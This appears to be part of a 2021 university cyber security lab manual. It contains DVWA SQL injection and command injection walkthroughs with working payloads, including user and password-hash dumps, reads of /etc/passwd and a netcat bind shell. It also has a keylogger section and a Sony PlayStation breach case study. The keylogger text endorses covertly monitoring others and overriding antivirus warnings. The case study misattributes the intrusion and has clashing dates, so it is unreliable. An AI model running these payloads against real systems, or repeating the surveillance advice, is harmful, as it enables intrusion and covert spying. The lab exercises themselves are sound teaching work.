Step 1: Setup DVWA for SQL Injection

After successfully installing DVWA, open your browser and enter the required
URL 127.0.0.1/dvwa/login.php Log in using the username “admin” and
password as “password”. These are the default DVWA login credentials. After
a successful login, set the DVWA security to LOW then click on SQL Injection
on the left-side menu.

COMPUTER ENGINEERING DEPARTMENT 59

 Cyber Security (3150714) 2021

Step 2: Basic Injection

On the User ID field, enter “1” and click Submit. That is supposed to print the
ID, First_name, and Surname on the screen as you can see below.
The SQL syntax being exploited here is:

Interestingly, when you check the URL, you will see there is an injectable
parameter which is the ID. Currently, my URL looks like this:

COMPUTER ENGINEERING DEPARTMENT 60

 Cyber Security (3150714) 2021

Let’s change the ID parameter of the URL to a number like 1,2,3,4 etc. That
will also return the First_name and Surname of all users as follows:

If you were executing this command directly on the DVWA database, the query
for User ID 3 would look like this:

Step 3: Always True Scenario

An advanced method to extract all the First_names and Surnames from the
database would be to use the input: %' or '1'='1'

COMPUTER ENGINEERING DEPARTMENT 61

 Cyber Security (3150714) 2021

The percentage % sign does not equal anything and will be false.
The '1'='1' query is registered as True since 1 will always equal 1. If you were
executing that on a database, the query would look like this:

COMPUTER ENGINEERING DEPARTMENT 62

 Cyber Security (3150714) 2021

Step 4: Display Database Version

To know the database version the DVWA application is running on, enter the
text below in the User ID field.

The database version will be listed under surname in the last line as shown in
the image below.

Step 5: Display Database User

To display the Database user who executed the PHP code powering the
database, enter the text below in the USER ID field.

The Database user is listed next to the surname field in the last line as in the
image below.

COMPUTER ENGINEERING DEPARTMENT 63

 Cyber Security (3150714) 2021

Step 6: Display Database Name

To display the database name, we will inject the SQL code below in the User
ID field.

The database name is listed next to the surname field in the last line.

COMPUTER ENGINEERING DEPARTMENT 64

 Cyber Security (3150714) 2021

Step 7: Display all tables in information_schema

The Information Schema stores information about tables, columns, and all the
other databases maintained by MySQL. To display all the tables, present in
the information_schema, use the text below.

COMPUTER ENGINEERING DEPARTMENT 65

 Cyber Security (3150714) 2021

Step 8: Display all the user tables in information_schema

For this step, we will print all the tables that start with the prefix user as stored
in the information_schema. Enter the SQL code below in the User ID.

%' and 1=0 union select null, table_name from information_schema.tables where table_name like

'user%'#

COMPUTER ENGINEERING DEPARTMENT 66

 Cyber Security (3150714) 2021

Step 9: Display all the columns fields in the

information_schema user table
We will print all the columns present in the users’ table. This information will
include column information like User_ID, first_name, last_name, user, and
password. Enter the input in the User_ID field.

%' and 1=0 union select null, concat(table_name,0x0a,column_name) from

information_schema.columns where table_name = 'users' #

COMPUTER ENGINEERING DEPARTMENT 67

 Cyber Security (3150714) 2021

Step 10: Display Column field contents

To display all the necessary authentication information present in the columns
as stored in the information_schema, use the SQL syntax below:

%' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users

COMPUTER ENGINEERING DEPARTMENT 68

 Cyber Security (3150714) 2021

From the image above, you can see the password was returned in its hashed
format. To extract the password, copy the MD5 hash and use applications like
John the Ripper to crack it. There are also sites available on the internet where
you can paste the hash and if lucky, you will be able to extract the password.

Conclusion:
From the various examples listed in this article, SQL injection proves to be a
critical vulnerability that can exist in a system. Not only can attackers exploit
it to reveal user or customer information, but it can also be used to corrupt
the entire database thus bringing the whole system down. As of writing this
post (2021), Injection is listed as the number one vulnerability in the OWASP
Top 10 Vulnerabilities summary. The DVWA acts as a reliable resource for both
penetration testers who want to improve their skills and web developers who
want to develop systems with security in mind.

COMPUTER ENGINEERING DEPARTMENT 69

 Cyber Security (3150714) 2021

PRACTICAL - 08
Aim: Examine Command Execution attack in DVWA
Command Execution or Command injection is an attack in which the goal is
execution of arbitrary commands on the host operating system via a
vulnerable application. Command injection attacks are possible when an
application passes unsafe user supplied data (forms, cookies, HTTP headers
etc.) to a system shell.

Low

if we check the source code for low

we can see that the code does not check if $target matches an IP Address. No
filtering on special characters. ; in Unix/Linux allows for commands to be
separated. 127.0.0.1; ls -la /root - list all the files in the root directory:

COMPUTER ENGINEERING DEPARTMENT 70

 Cyber Security (3150714) 2021

127.0.0.1; cat /etc/passwd | tee /tmp/passwd - Displays the contents of

/etc/passwd on the webpage and copies the contents of /etc/passwd file to
the /tmp directory.

Alternatives to;

&& - AND Operator

| - PIPE Operator - Completely removes IP address from output.

COMPUTER ENGINEERING DEPARTMENT 71

 Cyber Security (3150714) 2021

Medium

Viewing source code:

we see that a blacklist has been set to exclude && and; . As noted above, we
can use | as a replacement:

127.0.0.1| cat /etc/passwd. Double || can also be used,

High

Viewing source code, more extensive blacklist has been set. Slightly trickier,
however the answer is in the view source, '| ' => '', - note that there is a
space after the | character. If we try | pwd, no output is returned, however if
we use |pwd we are including our command within this space, as shown
below:

COMPUTER ENGINEERING DEPARTMENT 72

 Cyber Security (3150714) 2021

Bind Shell

192.168.1.147; /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe - Creates a

netcat listener, then use nc 192.168.1.147 4444 to connect. (Change IP
addresses to match those of target machine)

Points to note:

1. Ensure you are using commands specific to the target you are trying to
attack, all the above are Linux, Windows commands will be different.

2. Try commands with and without a space between them 3. You will not
always have access to the source code. OWASP:

https://www.owasp.org/index.php/Testing_for_Command_Injection_(O TG-
INPVAL-013)

COMPUTER ENGINEERING DEPARTMENT 73

 Cyber Security (3150714) 2021

PRACTICAL- 09

Aim: Examine software keyloggers and hardware keyloggers

What is a keylogger?

It’s something that records keystrokes and is normally used without the
consent of the user.

You’ve probably heard that keyloggers are a bad thing. It is when used for
illegal purposes, such as having a keylogger app installed without your
knowledge via spyware. But it’s not a bad thing when you are the one who
installed it to keep track of what people are doing when using your computer.
For example, if you’re a parent who thinks your child is doing not-so-good
things on the internet, you’ll be able to find out what’s been going on with a
keylogger.

If you decide to use one, you can opt to use hardware or software.

Hardware

Above is a hardware keylogger from ThinkGeek. It connects directly to the

keyboard connector, can be hidden easily and holds up to 128k of data. While
that may not sound like much, bear in mind it’s all text so it is actually quite
a bit. Additional features include password protection and keyword searching.

The only real drawback is that it is, as you can see, a PS/2 connector and not
USB. However, that can be easily remedied with an adapter should you use
USB.

Cost is $59.99

There are other hardware-based keyloggers out there on the internet, just do
a search for them and they’ll show up.

COMPUTER ENGINEERING DEPARTMENT 74

 Cyber Security (3150714) 2021

Software

You need not look any further than SourceForge to find freely available
keylogging applications for Windows and Linux.

Best Free Keylogger, a.k.a. BFK, is one of the better ones.

Bear in mind you do have to set up appropriate permissions for this app, and
if you use existing spyware/malware security software it may identify this app
as “dangerous”. Obviously, it isn’t, so if you see the warning(s), give the app
the appropriate security “pass”.

Which is better, hardware or software?

Hardware is the better of the two because it’s not an app you can simply
disable as it requires no software. The only way to disable the hardware is to
literally unplug it.

Will either slow down my computer?

No. It will run in the background seamlessly.

COMPUTER ENGINEERING DEPARTMENT 75

 Cyber Security (3150714) 2021

PRACTICAL: 10
Aim: Consider a case study of cybercrime, where the attacker has performed
online fraud. Prepare a report and also list the laws that will be implemented
on attacker.

Introduction
Organizations inevitably experience crisis and whether or not the organization
is prepared for a crisis determines some of the extent of the crisis at hand.
Scholars argue that a model is needed in order to help stop crises before they
arise prompting the creation of the Anticipatory Model of Crisis Management.
Sony’s crisis in April of 2011 provides a significant example for studying the
effects of an organization’s crisis to understand better the implications of
taking certain actions to alleviate a crisis. Sony experienced a security breach
of its online service called the PlayStation Network, and millions of customers
had personal information stolen including credit card information. Sony
estimates the losses from the PlayStation Network hacked at $171 million1 .
The purpose of this paper is to explore Sony’s crisis through a framework of
the Anticipatory Model of Crisis Management to highlight important
implications for online service providers in the future.

Case Overview
Sony Corporation is a company that produces several electronics. One of the
more popular products produced by Sony is the PlayStation gaming system.
Sony found itself in a colossal security breach. On April 20, 2011, Sony
executives started to investigate abnormal activity on the PlayStation
network, which ultimately led to the theft of over 100 million PlayStation users’
personal information and for some, credit card information2-4. Sony shut
down the network the day after suspicious activity was detected and although
Sony released almost daily announcements concerning the system outage,
the company waited almost a week (i.e., six days) after initial recognition to
release an announcement of the hacking itself 3, 5-6. In the final analysis,
Sony is reported to have invested approximately $170 million to cover the
expenses of caring for the consumers that had been affected, improving the
network’s security and customer support, as well as the investigation into the
hacking4 . The next portion of this case study offers a brief overview of the
COMPUTER ENGINEERING DEPARTMENT 76
 Cyber Security (3150714) 2021

anticipatory model of crisis management, which is used to examine the

effectiveness of Sony’s handling of the PlayStation hacking case.

Analysis and Evaluation of Sony PlayStation Hacking Case

There are four separate instances of how the tenets of the AMCM apply to the
ways in which Sony handled the situation of the PlayStation Network intrusion.
First, Sony failed to inform their customers about the breach until a week after
the hackers infiltrated the network.

Also, Sony failed to inform the customers that credit card information have
been stolen or compromised. Instead, Sony said that they did not believe
financial information was stolen. Second, Sony did not immediately shut down
the network when it knew of a possible security breach. Third, Sony
inaccurately accused a hacker group without the proper information. Fourth,
Sony gave a timeline for the network to be fully functional again, which it did
not meet. All four of these components of the network crisis provide ample
information for organizations to prepare better if they learn through the
AMCM.

Enactment and expectations all enlighten the first aspect of the Sony
PlayStation hacking crisis. Expectations play a huge role in the first element
of the Sony crisis because consumers expect corporations to safeguard their
credit card information when consumers are purchasing a product. However,
Sony did not meet the expectation principle because the credit card
information was stolen from 12 million of the members and the hackers
threatened to sell the information. Expectation was also not met concerning
the security breach because Sony did not immediately inform its consumers
that a security breach had occurred. Sony waited one week after the initial
breach to inform anyone outside of the organization about the breach. Once
it was known that the hackers stole credit card information during the breach,
it means that there was an entire week where the information of millions of
customers was in the hands of hackers and the consumers could not protect
themselves. Similar to the previous point, consumers expect a notification if
there is even the slightest possibility their confidential information could be at
risk. Consumers’ expectations were not met when Sony did not act

COMPUTER ENGINEERING DEPARTMENT 77

 Cyber Security (3150714) 2021

immediately and prudently on the information it possesses. Sony left the Sony
PlayStation network up and running while the crisis was ongoing, which affects
all of the aspects of the AMCM. Sony had the control to make sure the security
was the best available, consumers expect the best security, and Sony could
not act because of the lack of security measures, so all aspects of the AMCM
are present when evaluating Sony’s lapse of action. Similar to how Sony did
not inform players of the network being hacked, Sony did not immediately
close the network when the breach occurred because Sony’s security could
not detect the intrusion was occurring. Sony waited until April 20 th before
acting on the information about network intrusion25. Although, a company
may be strategic in not alarming the public, but recent crises has shown for
the most part that such a lack of notification is nothing more than mere
incompetence26-27. Furthermore, if Sony had shut down the network
immediately on the 17th, then few information would have been stolen by the
hackers. The notification, would have also given affected customers the
opportunity to take certain actions on their own (e.g., canceling credit cards).
Sony’s inability to act effectively affects both control of the crisis and
expectations discussed in the AMCM. Consumers expect that a company would
take all measures to stop a crisis from spiraling out of control. If the network
was hacked, then consumers would expect Sony to close any other possible
ways the hackers could affect the network, which would probably entail
shutting down the network. Sony has direct control on whether or not the
PlayStation Network functions or not because Sony owns the network. Failing
to act in a manner that is completely within a company’s direct control violates
the vigilance test of the AMCM.

The notion of control also highlights an aspect of the crisis where consumer
expectations were not met at the pre-crisis stage. Sony may not be able to
control whether or not hackers want to hack into a network. However, Sony
can control whether or not it has the best security in place for the network as
highlighted by Sony’s commitment to increasing security after the breach
occurred. Sony’s lack of effective detection system compromises the security
of the entire system. Hackers continued to attack for three days while Sony
was oblivious to the attack. Lulzsec, the group responsible for the intrusion,
detailed its intentions for the attack as being simple, stating on June 2nd
through a post on The Pirate Bay: “Our goal here is not to come across as
master hackers, hence what we’re about to reveal: SonyPictures.com was
owned by a very simple SQL injection, one of the most primitive and common

COMPUTER ENGINEERING DEPARTMENT 78

 Cyber Security (3150714) 2021

vulnerabilities, as we should all know by now. From a single injection, we

accessed EVERYTHING. Why do you put such faith in a company that allows
itself to become open to these simple attacks? Sony revamped its security
scheme after the breach occurred, which implies that additional security
existed in the first place25 but Sony chose not to use the increased security
for some reasons. Consumers expect their information to be secure with the
best sort of encryption security especially if the information deals with
finances. Sony again violated those expectations by not adequately preparing
for a possible crisis, which resulted in its 2011 crisis. Sony’s third issue when
using the AMCM was that Sony blamed the hacking group “Anonymous” when
the group had nothing to do with the 2011 breach29. Instead of investigating
the issue completely, Sony decided to initially blame Anonymous without the
adequate information. Sony had previously prosecuted George Hotz, an
Anonymous hacker, for tampering with the PlayStation 3 to allow it to play
unlicensed software, which Hotz proceeded to inform other players how to do
the same29. Sony assumed and believed without credible information that
Anonymous perpetrated the attack because a text file titled “Anonymous” with
the contents reading “We are legion,” part of Anonymous’ motto, was found
in the Sony servers after the intrusion. Anonymous denied the claim by issuing
the statement on May 4, 2011: "If you think Anonymous placed the ‘file’ on
the PSN try this out. Right click on your desktop, make a new text file, name
it anonymous, and type in the text file, ‘We are legion.’ That done?”28.
Eventually, Lulzsec, accepted the responsibility for the PlayStation Network
intrusion30. Sony’s false statement implicates the notions of expectations and
enactment. Consumers expect that an organization knows what caused a crisis
and if the organization does not know, then consumers do not want a
corporation that falsely accuses individuals or organizations for the
shortcomings of the corporation experiencing a crisis. Falsely accusing
Anonymous further hurts Sony’s crisis management because it looked as if
Sony did not know what was going on, which consumers expect of a
multibillion dollar company. Also, the fact that the crisis was kept secret for a
week should have given Sony ample time to investigate the problem. Thus,
Sony’s behavior and actions did not meet the consumers’ expectation that
Sony should be able to provide them credible explanation about the crisis and
in a timely manner. At the same time, falsely accusing another organization
for the problem makes Sony look as if it was not willing to accept its own
responsibility for the crisis. Sony tried to pin the crisis on a hacking group,
which was fairly wellknown, and make the hacking group the scapegoat

COMPUTER ENGINEERING DEPARTMENT 79

 Cyber Security (3150714) 2021

instead of taking responsibility for how its networks was compromised. The
blame shifting and scapegoating strategies by Sony not only violates
expectations but also hurts Sony in the eyes of its consumers.

Furthermore, Sony set a timeline to restore the PlayStation Network and did
not meet the deadline. Sony vowed to restore the network within a week’s
time and did not meet its own expectation. First, this hurt the company’s
consumers because consumers expect a technological company to understand
how much work is needed to restore a network. Instead, Sony looked
incompetent when it came to knowing how long it would take to restore the
network, which did not help Sony’s perception immediately after failing to stop
a security breach on their network. Second, control was affected by failing to
meet the timeline because it is completely within the company’s power to
meet its own deadlines. Sony initially set the deadline at a week25, so Sony
had control as to when the network needed to be restored because it was
Sony, not the media or gamers, who had full control on how to handle
consumer expectations. Sony looked as if it did not have any clue regarding
the functionality of its network, the security of the network, and capability of
its technicians in repairing the network. Subsequently, consumer expectations
and hopes were further dashed due to the lack of control demonstrated by
Sony. Finally, enacting the decision to restore the network appeared to be the
right thing; however, the company should have put in place measures to meet
the self-stipulated deadline. Expectations were high and the reestablishing of
the network was completely within the control of the company but the slow
implementation of necessary protocol to meet the deadline did not bode well
and hinders customers and other members of the public’s faith in Sony and
its crisis management plan. Next, the implications of this case study with
AMCM on a general business psychology level are discussed.

Limitations

There are a few limitations to this case study. To start with, the present study
employs a case study methodological approach. Generalization for a case
study is challenging and should be approached with caution. Future studies
should be conducted to further analyze the detailed information in order to
apply a general conclusion to a mass population. Nonetheless, the analysis of
the Sony PlayStation hacking crisis provides valuable lessons to other
companies that are at risk of hacking or theft of user information on what to
COMPUTER ENGINEERING DEPARTMENT 80
 Cyber Security (3150714) 2021

do and what not to do when managing this kind of crisis. Second, it is possible
that a comparison of similar crises would yield more influential results.
Perhaps, by contrasting how Sony has handled a crisis in the past and the
PlayStation hacking crisis, a trend might emerge showing how Sony handles
crises in general. Or juxtaposed, a compare/contrast method would yield
information that proves Sony took severe missteps for the PlayStation hacking
crisis only.

Conclusion

Sony made four primary mistakes when managing the 2011 hacking crisis.
First, Sony failed to inform its customers about the breach until a week after
the incident and Sony also failed to inform the customers that credit card
information might have been stolen. Second, Sony did not act immediately to
shut down the network. Third, Sony inaccurately accused a hacker group
without the proper information. Finally, Sony gave a timeline for the network
to be fully functional again, which it fails to meet. Through the application of
each of these missteps to the AMCM, it is demonstrated how to prevent the
same missteps from happening to another company. A proper pre-crisis
communication management plan is integral to handling crises and thus,
utilizing the AMCM is one way of accomplishing this goal. Implementation of
the AMCM as a pre-crisis focused strategy can increase consumer and
shareholder confidence, along with its flexibility in addressing human nature,
and consequently may help save the company’s reputation.

Reference

1. M. Hachman, Sony Playstation Network Hack nabbed personal info, maybe

credit card information. PCMag.com (April 26, 2011).
Http://www.pcmag.comarticle2/0,2817,2384353,00.asp.

2. S. Knafo, Sony playstation network hack is just the beginning of giant data
thefts: Experts. Huffington Post, (2011, May 6). Retrieved from Published by
Atlantis Press Copyright: the authors 157
http://www.huffingtonpost.com/2011/05/06/playstationtheft-sony-
hack_n_858355.html

3. J. Tessler, Sony explains playstation network hack to congress. Huffington

Post, (2011, May 4). Retrieved from

COMPUTER ENGINEERING DEPARTMENT 81

 Cyber Security (3150714) 2021

http://www.huffingtonpost.com/2011/05/04/sonyplaystation-
congress_n_857811.html

4. M. Yamaguchi, Sony playstation network hack to cost $170 million.

Huffington Post, M. (2011, May 23). Retrieved from
http://www.huffingtonpost.com/2011/05/23/sonyplaystation-network-hack-
cost_n_865432.html

5. D. Goodin, User data stolen in sony playstation network hack attack. The
Register, (2011, April 26). Retrieved from
http://www.theregister.co.uk/2011/04/26/sony_playstatio
n_network_security_breach/

6. M. Williams, Playstation network hack timeline. PC World. (2011, May 1).

Retrieved from http://www.pcworld.com/article/226802/playstation_net
work_hack_timeline.html

COMPUTER ENGINEERING DEPARTMENT 82